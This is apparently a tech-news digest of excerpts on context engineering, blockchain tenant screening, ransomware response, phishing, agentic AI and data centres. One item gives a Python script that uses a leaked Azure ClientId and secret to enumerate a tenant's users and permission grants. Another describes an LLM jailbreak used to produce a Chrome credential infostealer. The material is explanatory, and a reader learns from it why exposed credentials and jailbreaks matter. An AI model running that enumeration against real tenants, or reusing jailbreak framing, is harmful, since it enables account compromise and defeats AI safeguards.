Quote for the day:
"Little minds are tamed and subdued by
misfortune; but great minds rise above it." -- Washington Irving

Context engineering is the strategic design, management, and delivery of relevant information—or “context”—to AI systems in order to guide, constrain, or enhance their behavior. Unlike prompt engineering, which primarily focuses on crafting effective input prompts to direct model outputs, context engineering involves curating, structuring, and governing the broader pool of information that surrounds and informs the AI’s decision-making process. In practice, context engineering requires an understanding of not only what the AI should know at a given moment but also how information should be prioritized, retrieved, and presented. It encompasses everything from assembling relevant documents and dialogue history to establishing policies for data inclusion and exclusion. ... While there is some overlap between the two domains, context engineering and prompt engineering serve distinct purposes and employ different methodologies. Prompt engineering is concerned with the formulation of the specific text—the “prompt”—that is provided to the model as an immediate input. It is about phrasing questions, instructions, or commands in a way that elicits the desired behavior or output from the AI. Successful prompt engineering involves experimenting with wording, structure, and sometimes even formatting to maximize the performance of the language model on a given task.
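
The distinction is easier to see in a sketch. The hypothetical Python below treats the final user question as the "prompt," while the context-engineering work is everything assembled around it: retrieval, dialogue-history trimming, and an inclusion policy. All function names, the character budget, and the policy wording are assumptions made up for illustration, not any particular framework's API.

```python
# Minimal sketch of context engineering vs. prompt engineering.
# Every name here (retrieve_documents, trim_history, build_request) is an
# illustrative placeholder, not a specific framework's API.

MAX_CONTEXT_CHARS = 12_000  # assumed budget for the model's context window

def retrieve_documents(query: str, store: list[dict], k: int = 3) -> list[dict]:
    """Hypothetical retrieval step: rank stored documents by keyword overlap."""
    scored = sorted(
        store,
        key=lambda d: sum(w in d["text"].lower() for w in query.lower().split()),
        reverse=True,
    )
    return scored[:k]

def trim_history(history: list[str], budget: int) -> list[str]:
    """Keep the most recent dialogue turns that fit inside the character budget."""
    kept: list[str] = []
    used = 0
    for turn in reversed(history):
        if used + len(turn) > budget:
            break
        kept.insert(0, turn)
        used += len(turn)
    return kept

def build_request(user_prompt: str, docs: list[dict], history: list[str]) -> str:
    """Context engineering: wrap the prompt with policy, documents, and history,
    instead of sending the prompt alone."""
    doc_block = "\n\n".join(f"[{d['title']}]\n{d['text']}" for d in docs)
    history_block = "\n".join(trim_history(history, MAX_CONTEXT_CHARS // 4))
    return (
        "Policy: answer only from the documents below; say 'unknown' otherwise.\n\n"
        f"Documents:\n{doc_block}\n\n"
        f"Conversation so far:\n{history_block}\n\n"
        f"User question (the prompt): {user_prompt}"
    )
```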

While artificial intelligence provides both intelligence and speed, Blockchain
technology provides the essential foundation of trust and security. Blockchain
functions as a permanent digital record – meaning that once information is
set, it can’t be changed or deleted by third parties. This feature is
particularly groundbreaking for ensuring a safe and clear rental history.
Picture this: the rental payments and lease contracts of your tenants could
all be documented as ‘smart contracts’ using Blockchain technology. ... The
combination of AI and Blockchain signifies a groundbreaking transformation,
enabling tenants to create ‘self-sovereign identities’ on the Blockchain —
digital wallets that hold their verified credentials, which they fully
control. When searching for rental properties, tenants can conveniently
provide prospective landlords with access to certain details about themselves,
such as their history of timely payments and police records. AI leverages
secure and authentic Blockchain data to produce an immediate risk score for
landlords to assess, ensuring a quick and reliable evaluation. This cohesive
approach guarantees that AI outcomes are both rapid and trustworthy, while the
decentralized nature of Blockchain safeguards tenant privacy by removing the
need for central databases that can become vulnerable over time.
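
As a rough illustration of the risk-scoring step described above, here is a toy Python sketch that computes a score from verified payment records a tenant might share from such a wallet. The record format, weights, and score scale are all assumptions invented for this example; the quoted piece does not specify an implementation, and no particular blockchain or AI stack is implied.

```python
# Toy risk score over verified payment records shared from a tenant's
# self-sovereign identity wallet. All fields and weights are illustrative.
from dataclasses import dataclass

@dataclass
class PaymentRecord:
    month: str        # e.g. "2024-05"
    paid_on_time: bool
    verified: bool    # whether the record carries a valid credential signature

def rental_risk_score(records: list[PaymentRecord]) -> float:
    """Return a score in [0, 100]; higher means lower estimated risk."""
    usable = [r for r in records if r.verified]  # ignore anything unverifiable
    if not usable:
        return 0.0  # no verified history: maximum uncertainty
    on_time_ratio = sum(r.paid_on_time for r in usable) / len(usable)
    history_weight = min(len(usable) / 24, 1.0)  # cap the benefit of long histories
    return round(100 * on_time_ratio * (0.5 + 0.5 * history_weight), 1)

# Example: 12 months of verified, on-time payments.
history = [PaymentRecord(f"2024-{m:02d}", True, True) for m in range(1, 13)]
print(rental_risk_score(history))  # 75.0 with these illustrative weights
```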

New research from Cato Networks’ threat intelligence report revealed how threat
actors can use a large language model jailbreak technique, known as an immersive
world attack, to get AI to create infostealer malware for them: a
threat intelligence researcher with absolutely no malware coding experience
managed to jailbreak multiple large language models and get the AI to create a
fully functional, highly dangerous password infostealer to compromise
sensitive information from the Google Chrome web browser. The end result was
malicious code that successfully extracted credentials from the Google Chrome
password manager. Companies that create LLMs are trying to put up guardrails,
but clearly GenAI can make malware creation that much easier. AI-generated
malware, including polymorphic malware, essentially makes signature-based
detections nearly obsolete. Enterprises must be prepared to protect against
hundreds, if not thousands, of malware variants. ... Enterprises can increase
their protection by embedding security directly into applications at the build
stage: this involves investing in embedded security that is mapped to OWASP
controls, such as RASP, advanced white-box cryptography, and granular threat
intelligence. IDC research shows that organizations protecting mobile apps
often lack a solution to test them efficiently and effectively.

Moving too quickly following an attack can also prompt staff to respond to an
intrusion without first fully understanding the type of ransomware that was
used. Not all ransomware is created equal, and knowing whether you were a victim
of locker ransomware, double extortion, ransomware-as-a-service, or another kind
of attack can make all the difference in how to respond, because the goal of the
attacker is different for each. ... The first couple of hours after a ransomware
incident is identified are critical. In those immediate hours, work quickly to
identify and isolate affected systems and disconnect compromised devices from
the network to prevent the ransomware from spreading further. Don’t forget to
preserve forensic evidence as you go, such as screenshots and relevant logs, and
anything else that can inform future law enforcement investigations or legal
action. Once
that has been done, notify the key stakeholders and the cyber insurance
provider. ... After the dust settles, analyze how the attack was able to occur
and put in place fixes to keep it from happening again. Identify the initial
access point and method, and map how the threat actor moved through the network.
What barriers were they able to move past, and which held them back? Are there
areas where more segmentation is needed to reduce the attack surface? Do any
security workflows or policies need to be modified?

“While companies often admit to sharing user data with third parties, it’s
nearly impossible to track every recipient. That lack of control creates real
vulnerabilities in data privacy management. Very few organizations thoroughly
vet their third-party data-sharing practices, which raises accountability
concerns and increases the risk of breaches,” said Ian Cohen, CEO of LOKKER. The
criminal marketplace for stolen data has exploded in recent years. In 2024, over
6.8 million accounts were listed for sale, and by early 2025, nearly 2.5 million
stolen accounts were available at one point. ... Even limited purchase
information can prove valuable to criminals. A breach exposing high-value
transactions, for example, may suggest a buyer’s financial status or lifestyle.
When combined with leaked addresses, that data can help criminals identify and
target individuals more precisely, whether for fraud, identity theft, or even
physical theft. ... One key mechanism is the right to be forgotten, a legal
principle allowing individuals to request the removal of their personal data
from online platforms. The European Union’s GDPR is the strongest example of
this principle in action. While not as comprehensive as the GDPR, US privacy
laws such as the California Consumer Privacy Act (CCPA) allow residents to
access or delete their personal data.

The ink is barely dry on generative AI and AI agents, and now we have a new next
big thing: agentic AI. Sounds impressive. By the time this article comes out,
there’s a good chance that agentic AI will be in the rear-view mirror and we’ll
all be chasing after the next new big thing. Anyone for autonomous generative
agentic AI agent bots? ... Some things on the surface seem more irresponsible
than others, but to some people, agentic AI apparently doesn’t seem so
irresponsible. Debugging large language models, AI agents, and agentic AI, as
well as implementing guardrails, are topics for another time, but it’s important
to recognize that companies are
handing over those car keys. Willingly. Enthusiastically. Would you put that
eighth grader in charge of your marketing department? Of autonomously creating
collateral that goes out to your customers without checking it first? Of course
not. ... We want AI agents and agentic AI to make decisions, but we must be
intentional about the decisions they are allowed to make. What are the stakes
personally, professionally, or for the organization? What is the potential
liability when something goes wrong? And something will go wrong. Something that
you never considered going wrong will go wrong. And maybe think about the
importance of the training data. Isn’t that what we say when an actual person
does something wrong? “They weren’t adequately trained.” Same thing here.

As long as software developers and AI designers continue to fall prey to the
substitution myth, we’ll continue to develop systems and tools that, instead of
supposedly making humans’ lives easier/better, will require unexpected new
skills and interventions from humans that weren’t factored into the system/tool
design
... Software development covers a lot of ground: understanding requirements,
architecting, designing, coding, writing tests, code review, debugging, building
new skills and knowledge, and more. AI has now reached a
point where it can automate or speed up almost every part of the process. This
is an exciting time to be a builder. A lot of the routine, repetitive, and
frankly boring parts of the job, the "cognitive grunt work", can now be handled
by AI. Developers especially appreciate the help in areas like generating test
cases, reviewing code, and writing documentation. When those tasks are off our
plate, we can spend more time on the things that really add value: solving
complex problems, designing great systems, thinking strategically, and growing
our skills. ... The elephant in the room is the question: will AI take over my
job one day? Until this year, I always thought no, but the recent technological
advancements and new product offerings in this space are beginning to change my
mind. The reality is that we should be prepared for AI to change the software
development role as we know it.

Phishing tooling and infrastructure have evolved a lot in the past decade, while
changes to business IT mean there are both many more vectors for phishing attack
delivery and many more apps and identities to target. Attackers can deliver links
over instant messenger apps, social media, SMS, malicious ads, and using in-app
messenger functionality, as well as sending emails directly from SaaS services
to bypass email-based checks. Likewise, there are now hundreds of apps per
enterprise to target, with varying levels of account security configuration. ...
Like modern credential and session phishing, links to malicious pages are
distributed over various delivery channels and using a variety of lures,
including impersonating CAPTCHAs and Cloudflare Turnstile checks, simulating an
error loading a webpage, and many more. The variance in lure, and differences
between
different versions of the same lure, can make it difficult to fingerprint and
detect based on visual elements alone. ... Preventing malicious OAuth grants
from being authorized requires tight in-app management of user permissions and
tenant security settings. This is no mean feat when considering the hundreds of
apps in use across the modern enterprise, many of which are not centrally
managed by IT and security teams.

"The critical risk lies in the fact that this file was publicly accessible over
the Internet," according to the post. "This means anyone — from opportunistic
bots to advanced threat actors — could harvest the credentials and immediately
leverage them for cloud account compromise, data theft, or further intrusion."
... To exploit the flaw, an attacker can first use the leaked ClientId and
ClientSecret to authenticate against Azure AD using the OAuth2 Client
Credentials flow to acquire an access token. Once this is acquired, the attacker
then can send a GET request to the Microsoft Graph API to enumerate users within
the tenant. This allows them to collect usernames and emails; build a list for
password spraying or phishing; and/or identify naming conventions and internal
accounts, according to the post. The attacker also can query the Microsoft Graph
API to enumerate OAuth2 permission grants within the tenant, revealing which
applications have been authorized and what scopes, or permissions, they hold.
Finally, the acquired token allows an attacker to use group information to
identify privilege clusters and business-critical teams, thus exposing
organizational structure and identifying key targets for compromise, according
to the post. ... "What appears to be a harmless JSON configuration file can in
reality act as a master key to an organization’s cloud kingdom," according to
the post.
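
The chain described in the post maps onto the standard, publicly documented Microsoft identity platform flow, which is what makes a leaked ClientId and ClientSecret so dangerous. The sketch below uses the requests library with obvious placeholder values; the endpoints are the standard public ones, and whether the enumeration calls succeed depends entirely on the application permissions the leaked app registration actually holds (for example, listing users with an app-only token requires an admin-consented permission such as User.Read.All).

```python
# Sketch of the flow described in the post: OAuth2 client credentials grant
# against Microsoft Entra ID (Azure AD), then Microsoft Graph calls to
# enumerate users and OAuth2 permission grants. Placeholder values only.
import requests

TENANT_ID = "<tenant-guid>"          # placeholder
CLIENT_ID = "<leaked-client-id>"     # placeholder
CLIENT_SECRET = "<leaked-secret>"    # placeholder

# 1. Acquire an app-only access token via the client credentials flow.
token_resp = requests.post(
    f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/v2.0/token",
    data={
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "scope": "https://graph.microsoft.com/.default",
        "grant_type": "client_credentials",
    },
)
access_token = token_resp.json()["access_token"]
headers = {"Authorization": f"Bearer {access_token}"}

# 2. Enumerate users in the tenant (names, emails) via Microsoft Graph.
users = requests.get("https://graph.microsoft.com/v1.0/users", headers=headers).json()

# 3. Enumerate OAuth2 permission grants to see which apps hold which scopes.
grants = requests.get(
    "https://graph.microsoft.com/v1.0/oauth2PermissionGrants", headers=headers
).json()
```
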
Data center owners and operators are uniquely positioned to step up and play a
larger, more proactive role in this by pushing back on tech manufacturers in
terms of the patchy emissions data they provide, while also facilitating
sustainable circular IT product lifecycle management/disposal solutions for
their users and customers. ... The hard truth, however, is that any data center
striving to meet its own decarbonization goals and obligations cannot do so
singlehandedly. It’s largely beholden to the supply chain stakeholders upstream.
At the same time, its customers and users tend to accept ever-shortening usage
periods as the norm. Often, they overlook the benefits of achieving greater
product longevity and optimal cost of ownership through the implementation of
product maintenance, refurbishment, and reuse programmes. ... As a focal point
for the enablement of the digital economy, data centers are ideally placed to
take a much more active role: by lobbying manufacturers, educating users and
customers about the necessity and benefits of changing conventional linear
practices in favour of circular IT lifecycle management and recycling solutions.
Such an approach will help decarbonize not only data centers themselves but also
the entire tech industry supply chain by reducing emissions.